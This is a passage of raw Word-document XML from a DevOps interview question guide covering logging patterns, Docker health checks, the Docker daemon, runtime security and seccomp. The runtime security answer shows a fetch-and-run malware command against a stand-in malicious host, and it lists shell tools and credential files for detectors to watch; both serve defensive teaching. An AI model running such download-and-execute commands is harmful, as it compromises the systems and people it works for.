        <w:br/>
        <w:t>❌ More containers to monitor</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Sidecar vs DaemonSet Logging</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Sidecar</w:t>
        <w:br/>
        <w:tab/>
        <w:t>DaemonSet</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Runs Per Pod</w:t>
        <w:br/>
        <w:tab/>
        <w:t>✅</w:t>
        <w:br/>
        <w:tab/>
        <w:t>❌</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Runs Per Node</w:t>
        <w:br/>
        <w:tab/>
        <w:t>❌</w:t>
        <w:br/>
        <w:tab/>
        <w:t>✅</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Resource Usage</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Higher</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Lower</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Application-Specific Processing</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Excellent</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Limited</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Scalability</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Lower</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Better</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Modern Kubernetes environments often prefer DaemonSet-based logging (e.g., Fluent Bit on every node) because it is more resource-efficient.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (7+ Years Experience)</w:t>
        <w:br/>
        <w:t>Sidecar logging is a Kubernetes logging pattern where a dedicated logging container runs alongside the application container within the same Pod. The sidecar typically reads log files from a shared volume, processes or enriches the logs, and forwards them to a centralized logging platform such as Elasticsearch, Splunk, or Loki. This approach is particularly useful for legacy applications that write logs to files instead of STDOUT. While sidecar logging provides flexibility and application-specific log processing, it increases resource consumption because each Pod requires an additional logging container. For large-scale environments, DaemonSet-based log collection is often preferred for efficiency.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q386. Explain health checks in Docker.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: What are Health Checks in Docker?</w:t>
        <w:br/>
        <w:t>Health checks are a mechanism used by Docker to determine whether a containerized application is healthy and functioning correctly.</w:t>
        <w:br/>
        <w:t>A container may be running, but the application inside it could be unresponsive. Health checks help detect such situations.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why Are Health Checks Needed?</w:t>
        <w:br/>
        <w:t>Without health checks:</w:t>
        <w:br/>
        <w:t>Container Status: Running ✅</w:t>
        <w:br/>
        <w:t>Application: Hung ❌</w:t>
        <w:br/>
        <w:t>Docker only knows that the process exists.</w:t>
        <w:br/>
        <w:t>With health checks:</w:t>
        <w:br/>
        <w:t>Container Running</w:t>
        <w:br/>
        <w:t xml:space="preserve">      │</w:t>
        <w:br/>
        <w:t>Health Check</w:t>
        <w:br/>
        <w:t xml:space="preserve">      │</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ▼</w:t>
        <w:br/>
        <w:t>Healthy / Unhealthy</w:t>
        <w:br/>
        <w:t>Docker can determine the actual application state.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>HEALTHCHECK Instruction</w:t>
        <w:br/>
        <w:t>Dockerfile:</w:t>
        <w:br/>
        <w:t>FROM nginx</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>HEALTHCHECK CMD curl -f http://localhost/ || exit 1</w:t>
        <w:br/>
        <w:t>Docker periodically executes:</w:t>
        <w:br/>
        <w:t>curl -f http://localhost/</w:t>
        <w:br/>
        <w:t>If successful:</w:t>
        <w:br/>
        <w:t>healthy</w:t>
        <w:br/>
        <w:t>If it fails:</w:t>
        <w:br/>
        <w:t>unhealthy</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Health Check States</w:t>
        <w:br/>
        <w:t>starting</w:t>
        <w:br/>
        <w:t xml:space="preserve">   │</w:t>
        <w:br/>
        <w:t xml:space="preserve">   ▼</w:t>
        <w:br/>
        <w:t>healthy</w:t>
        <w:br/>
        <w:t xml:space="preserve">   │</w:t>
        <w:br/>
        <w:t xml:space="preserve">   ▼</w:t>
        <w:br/>
        <w:t>unhealthy</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * starting → Initial state</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * healthy → Check passed</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * unhealthy → Check failed repeatedly</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example</w:t>
        <w:br/>
        <w:t>HEALTHCHECK --interval=30s \</w:t>
        <w:br/>
        <w:t xml:space="preserve">            --timeout=5s \</w:t>
        <w:br/>
        <w:t xml:space="preserve">            --retries=3 \</w:t>
        <w:br/>
        <w:t xml:space="preserve">            CMD curl -f http://localhost:8080/health || exit 1</w:t>
        <w:br/>
        <w:t>Parameters:</w:t>
        <w:br/>
        <w:t>Option</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Description</w:t>
        <w:br/>
        <w:tab/>
        <w:t>--interval</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Time between checks</w:t>
        <w:br/>
        <w:tab/>
        <w:t>--timeout</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Max check duration</w:t>
        <w:br/>
        <w:tab/>
        <w:t>--retries</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Failures before unhealthy</w:t>
        <w:br/>
        <w:tab/>
        <w:t>--start-period</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Startup grace period</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Check Health Status</w:t>
        <w:br/>
        <w:t>docker ps</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>STATUS</w:t>
        <w:br/>
        <w:t>Up 10 minutes (healthy)</w:t>
        <w:br/>
        <w:t>Detailed view:</w:t>
        <w:br/>
        <w:t>docker inspect mycontainer</w:t>
        <w:br/>
        <w:t>Output:</w:t>
        <w:br/>
        <w:t>"Health": {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "Status": "healthy"</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example for API</w:t>
        <w:br/>
        <w:t>HEALTHCHECK CMD curl -f http://localhost:8080/actuator/health || exit 1</w:t>
        <w:br/>
        <w:t>Common for:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Spring Boot</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Node.js APIs</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Python Flask applications</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Health Check vs Liveness Probe</w:t>
        <w:br/>
        <w:t>Docker:</w:t>
        <w:br/>
        <w:t>Container</w:t>
        <w:br/>
        <w:t xml:space="preserve">    │</w:t>
        <w:br/>
        <w:t>Health Check</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ▼</w:t>
        <w:br/>
        <w:t>Healthy / Unhealthy</w:t>
        <w:br/>
        <w:t>Kubernetes:</w:t>
        <w:br/>
        <w:t>Liveness Probe</w:t>
        <w:br/>
        <w:t>Readiness Probe</w:t>
        <w:br/>
        <w:t>Startup Probe</w:t>
        <w:br/>
        <w:t>Kubernetes provides more advanced health monitoring capabilities.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Best Practices</w:t>
        <w:br/>
        <w:t>✅ Check application functionality, not just process existence</w:t>
        <w:br/>
        <w:t>✅ Use lightweight commands</w:t>
        <w:br/>
        <w:t>✅ Expose dedicated /health endpoints</w:t>
        <w:br/>
        <w:t>✅ Configure appropriate intervals and retries</w:t>
        <w:br/>
        <w:t>✅ Avoid expensive database queries in health checks</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Common Examples</w:t>
        <w:br/>
        <w:t>HTTP Check:</w:t>
        <w:br/>
        <w:t>HEALTHCHECK CMD curl -f http://localhost:8080/health || exit 1</w:t>
        <w:br/>
        <w:t>TCP Check:</w:t>
        <w:br/>
        <w:t>HEALTHCHECK CMD nc -z localhost 3306 || exit 1</w:t>
        <w:br/>
        <w:t>Process Check:</w:t>
        <w:br/>
        <w:t>HEALTHCHECK CMD pgrep java || exit 1</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (7+ Years Experience)</w:t>
        <w:br/>
        <w:t>Docker health checks provide a mechanism to verify that an application inside a container is functioning correctly, not just that the container process is running. They are defined using the HEALTHCHECK instruction in a Dockerfile and periodically execute a command such as an HTTP request or process check. Based on the results, Docker marks the container as healthy, starting, or unhealthy. Health checks improve operational visibility and help orchestration platforms make informed decisions about workload health and availability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q387. What is Docker daemon?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: What is Docker Daemon?</w:t>
        <w:br/>
        <w:t>The Docker Daemon (dockerd) is the background service that manages Docker objects such as:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Containers</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Images</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Networks</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Volumes</w:t>
        <w:br/>
        <w:t>It is the core component of the Docker Engine and is responsible for building, running, and managing containers.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Docker Architecture</w:t>
        <w:br/>
        <w:t>+----------------+</w:t>
        <w:br/>
        <w:t>| Docker Client  |</w:t>
        <w:br/>
        <w:t>| (docker CLI)   |</w:t>
        <w:br/>
        <w:t>+--------+-------+</w:t>
        <w:br/>
        <w:t xml:space="preserve">         |</w:t>
        <w:br/>
        <w:t xml:space="preserve">         | REST API</w:t>
        <w:br/>
        <w:t xml:space="preserve">         ▼</w:t>
        <w:br/>
        <w:t>+----------------+</w:t>
        <w:br/>
        <w:t>| Docker Daemon  |</w:t>
        <w:br/>
        <w:t>|   (dockerd)    |</w:t>
        <w:br/>
        <w:t>+--------+-------+</w:t>
        <w:br/>
        <w:t xml:space="preserve">         |</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ┌───────┼────────┐</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ▼       ▼        ▼</w:t>
        <w:br/>
        <w:t>Images Containers Networks</w:t>
        <w:br/>
        <w:t>When you run a Docker command, the CLI communicates with the Docker daemon, which performs the actual work.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example</w:t>
        <w:br/>
        <w:t>Command:</w:t>
        <w:br/>
        <w:t>docker run nginx</w:t>
        <w:br/>
        <w:t>Flow:</w:t>
        <w:br/>
        <w:t>docker run nginx</w:t>
        <w:br/>
        <w:t xml:space="preserve">       │</w:t>
        <w:br/>
        <w:t xml:space="preserve">       ▼</w:t>
        <w:br/>
        <w:t>Docker CLI</w:t>
        <w:br/>
        <w:t xml:space="preserve">       │</w:t>
        <w:br/>
        <w:t xml:space="preserve">       ▼</w:t>
        <w:br/>
        <w:t>Docker Daemon</w:t>
        <w:br/>
        <w:t xml:space="preserve">       │</w:t>
        <w:br/>
        <w:t xml:space="preserve">       ▼</w:t>
        <w:br/>
        <w:t>Pull Image (if needed)</w:t>
        <w:br/>
        <w:t xml:space="preserve">       │</w:t>
        <w:br/>
        <w:t xml:space="preserve">       ▼</w:t>
        <w:br/>
        <w:t>Create Container</w:t>
        <w:br/>
        <w:t xml:space="preserve">       │</w:t>
        <w:br/>
        <w:t xml:space="preserve">       ▼</w:t>
        <w:br/>
        <w:t>Start Container</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Responsibilities of Docker Daemon</w:t>
        <w:br/>
        <w:t>1. Container Management</w:t>
        <w:br/>
        <w:t>docker run</w:t>
        <w:br/>
        <w:t>docker stop</w:t>
        <w:br/>
        <w:t>docker restart</w:t>
        <w:br/>
        <w:t>docker rm</w:t>
        <w:br/>
        <w:t>Creates, starts, stops, and removes containers.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Image Management</w:t>
        <w:br/>
        <w:t>docker pull</w:t>
        <w:br/>
        <w:t>docker build</w:t>
        <w:br/>
        <w:t>docker push</w:t>
        <w:br/>
        <w:t>Manages image lifecycle.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Network Management</w:t>
        <w:br/>
        <w:t>Creates and manages:</w:t>
        <w:br/>
        <w:t>Bridge Networks</w:t>
        <w:br/>
        <w:t>Host Networks</w:t>
        <w:br/>
        <w:t>Overlay Networks</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>4. Volume Management</w:t>
        <w:br/>
        <w:t>Handles persistent storage:</w:t>
        <w:br/>
        <w:t>docker volume create</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>5. API Server</w:t>
        <w:br/>
        <w:t>The daemon exposes a REST API used by:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Docker CLI</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Docker Compose</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * CI/CD tools</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Third-party integrations</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Docker Daemon Process</w:t>
        <w:br/>
        <w:t>Check status:</w:t>
        <w:br/>
        <w:t>systemctl status docker</w:t>
        <w:br/>
        <w:t>or</w:t>
        <w:br/>
        <w:t>ps -ef | grep dockerd</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>/usr/bin/dockerd</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Communication with Docker Daemon</w:t>
        <w:br/>
        <w:t>Default socket:</w:t>
        <w:br/>
        <w:t>/var/run/docker.sock</w:t>
        <w:br/>
        <w:t>Docker CLI communicates through this Unix socket.</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>docker ps</w:t>
        <w:br/>
        <w:t>Docker CLI</w:t>
        <w:br/>
        <w:t xml:space="preserve">      │</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ▼</w:t>
        <w:br/>
        <w:t>/var/run/docker.sock</w:t>
        <w:br/>
        <w:t xml:space="preserve">      │</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ▼</w:t>
        <w:br/>
        <w:t>dockerd</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Security Consideration</w:t>
        <w:br/>
        <w:t>Access to:</w:t>
        <w:br/>
        <w:t>/var/run/docker.sock</w:t>
        <w:br/>
        <w:t>effectively grants Docker administrative privileges.</w:t>
        <w:br/>
        <w:t>This is why membership in the Docker group should be controlled carefully.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Docker Daemon and Container Runtime</w:t>
        <w:br/>
        <w:t>Modern Docker architecture:</w:t>
        <w:br/>
        <w:t>dockerd</w:t>
        <w:br/>
        <w:t xml:space="preserve">   │</w:t>
        <w:br/>
        <w:t>containerd</w:t>
        <w:br/>
        <w:t xml:space="preserve">   │</w:t>
        <w:br/>
        <w:t>runc</w:t>
        <w:br/>
        <w:t xml:space="preserve">   │</w:t>
        <w:br/>
        <w:t>Container</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * dockerd → Docker management layer</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * containerd → Container lifecycle management</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * runc → Creates and runs containers using Linux namespaces and cgroups</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Restart Docker Daemon</w:t>
        <w:br/>
        <w:t>Linux:</w:t>
        <w:br/>
        <w:t>sudo systemctl restart docker</w:t>
        <w:br/>
        <w:t>Check:</w:t>
        <w:br/>
        <w:t>docker info</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (7+ Years Experience)</w:t>
        <w:br/>
        <w:t>The Docker daemon, dockerd, is the core background service of Docker Engine responsible for managing containers, images, networks, and volumes. It exposes a REST API that the Docker CLI and other tools use to communicate with Docker. When a user executes commands such as docker run or docker build, the Docker daemon performs the actual operations, including image management, container lifecycle management, networking, and storage provisioning. Internally, modern Docker uses containerd and runc beneath the daemon to create and manage containers. The daemon typically listens on /var/run/docker.sock and requires careful access control because it effectively provides administrative access to the host system.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q388. Explain runtime security.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Runtime Security</w:t>
        <w:br/>
        <w:t>Runtime Security is the practice of monitoring, detecting, and preventing security threats while an application, container, virtual machine, or Kubernetes workload is actively running in production.</w:t>
        <w:br/>
        <w:t>Unlike static security checks (code scanning, image scanning, IaC scanning), runtime security focuses on what is happening after deployment.</w:t>
        <w:br/>
        <w:t>Why Runtime Security is Important</w:t>
        <w:br/>
        <w:t>Even if:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Source code is secure</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Container images are scanned</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Infrastructure is hardened</w:t>
        <w:br/>
        <w:t>Attackers may still:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Exploit zero-day vulnerabilities</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Gain unauthorized access</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Execute malicious commands</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Escalate privileges</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Move laterally across systems</w:t>
        <w:br/>
        <w:t>Runtime security helps detect and stop these activities in real time.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example</w:t>
        <w:br/>
        <w:t>Imagine a containerized application running in Kubernetes.</w:t>
        <w:br/>
        <w:t>Normal behavior:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Reads application files</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Connects to a database</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Writes logs</w:t>
        <w:br/>
        <w:t>Suspicious behavior:</w:t>
        <w:br/>
        <w:t>wget malicious-site.com/malware.sh</w:t>
        <w:br/>
        <w:t>chmod +x malware.sh</w:t>
        <w:br/>
        <w:t>./malware.sh</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>A runtime security tool detects:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Unexpected process execution</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Network connection to unknown hosts</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * File modifications</w:t>
        <w:br/>
        <w:t>and immediately:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Generates an alert</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Kills the process</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Isolates the container</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Runtime Security in Kubernetes</w:t>
        <w:br/>
        <w:t>Common threats:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               1. Privilege escalation</w:t>
        <w:br/>
        <w:t xml:space="preserve">               2. Container escape attempts</w:t>
        <w:br/>
        <w:t xml:space="preserve">               3. Reverse shells</w:t>
        <w:br/>
        <w:t xml:space="preserve">               4. Cryptomining malware</w:t>
        <w:br/>
        <w:t xml:space="preserve">               5. Unauthorized network access</w:t>
        <w:br/>
        <w:t xml:space="preserve">               6. Suspicious process execution</w:t>
        <w:br/>
        <w:t xml:space="preserve">               7. Sensitive file access</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key Runtime Security Controls</w:t>
        <w:br/>
        <w:t>1. Process Monitoring</w:t>
        <w:br/>
        <w:t>Track processes running inside containers.</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>bash</w:t>
        <w:br/>
        <w:t>sh</w:t>
        <w:br/>
        <w:t>nc</w:t>
        <w:br/>
        <w:t>curl</w:t>
        <w:br/>
        <w:t>wget</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Alert if unexpected processes start.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. File Integrity Monitoring</w:t>
        <w:br/>
        <w:t>Monitor critical files:</w:t>
        <w:br/>
        <w:t>/etc/passwd</w:t>
        <w:br/>
        <w:t>/etc/shadow</w:t>
        <w:br/>
        <w:t>/etc/ssh/</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Detect unauthorized modifications.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Network Monitoring</w:t>
        <w:br/>
        <w:t>Detect:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Connections to malicious IPs</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Unusual outbound traffic</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Lateral movement</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>4. Behavior Anomaly Detection</w:t>
        <w:br/>
        <w:t>Learn normal workload behavior and alert when:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * New process appears</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Unexpected port opens</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Abnormal traffic occurs</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>5. Threat Detection</w:t>
        <w:br/>
        <w:t>Detect:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Cryptominers</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Reverse shells</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Rootkits</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Known attack patterns</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Popular Runtime Security Tools</w:t>
        <w:br/>
        <w:t>Tool</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Purpose</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Falco</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Kubernetes runtime threat detection</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Sysdig Secure</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Runtime security and compliance</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Aqua Security</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Container and runtime protection</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Prisma Cloud</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Cloud workload protection</w:t>
        <w:br/>
        <w:tab/>
        <w:t>CrowdStrike Falcon</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Endpoint and workload security</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Microsoft Defender for Cloud</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Cloud workload protection</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Falco Example</w:t>
        <w:br/>
        <w:t>Falco watches Linux system calls.</w:t>
        <w:br/>
        <w:t>Rule:</w:t>
        <w:br/>
        <w:t>- rule: Terminal shell in container</w:t>
        <w:br/>
        <w:t xml:space="preserve">  condition: container and shell_procs</w:t>
        <w:br/>
        <w:t xml:space="preserve">  output: Shell spawned in container</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Alert:</w:t>
        <w:br/>
        <w:t>Shell spawned in container</w:t>
        <w:br/>
        <w:t>User=root</w:t>
        <w:br/>
        <w:t>Container=payment-service</w:t>
        <w:br/>
        <w:t>Process=bash</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>This indicates someone opened a shell inside a production container.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Runtime Security vs Image Scanning</w:t>
        <w:br/>
        <w:t>Image Scanning</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Runtime Security</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Before deployment</w:t>
        <w:br/>
        <w:tab/>
        <w:t>After deployment</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Finds CVEs</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Finds active attacks</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Static analysis</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Real-time monitoring</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Checks images</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Checks running workloads</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Preventive</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Detective &amp; responsive</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (2-Minute Version)</w:t>
        <w:br/>
        <w:t>Runtime security is the practice of monitoring and protecting applications, containers, VMs, and Kubernetes workloads while they are actively running in production. It focuses on detecting threats such as privilege escalation, unauthorized process execution, container escapes, reverse shells, and suspicious network activity. In Kubernetes environments, tools like Falco, Sysdig Secure, Aqua Security, and Prisma Cloud monitor system calls, file changes, and network behavior to identify attacks in real time. Runtime security complements image scanning and vulnerability management by protecting workloads after deployment and enabling rapid detection and response to security incidents.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q389. What is seccomp?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: What is Seccomp?</w:t>
        <w:br/>
        <w:t>Seccomp (Secure Computing Mode) is a Linux kernel security feature that restricts which system calls (syscalls) a process can make.</w:t>
        <w:br/>
        <w:t>It reduces the attack surface of applications by allowing only the syscalls that an application actually needs and blocking everything else.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why is Seccomp Needed?</w:t>
        <w:br/>
        <w:t>Every Linux process interacts with the kernel using system calls such as:</w:t>
        <w:br/>
        <w:t>open()</w:t>
        <w:br/>
        <w:t>read()</w:t>
        <w:br/>
        <w:t>write()</w:t>
        <w:br/>
        <w:t>fork()</w:t>
        <w:br/>
        <w:t>execve()</w:t>
        <w:br/>
        <w:t>mount()</w:t>
        <w:br/>
        <w:t>socket()</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>If an attacker compromises a container, they may try to use dangerous syscalls to:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Spawn new processes</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Mount filesystems</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Load kernel modules</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Escalate privileges</w:t>
        <w:br/>
        <w:t>Seccomp can block those syscalls.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
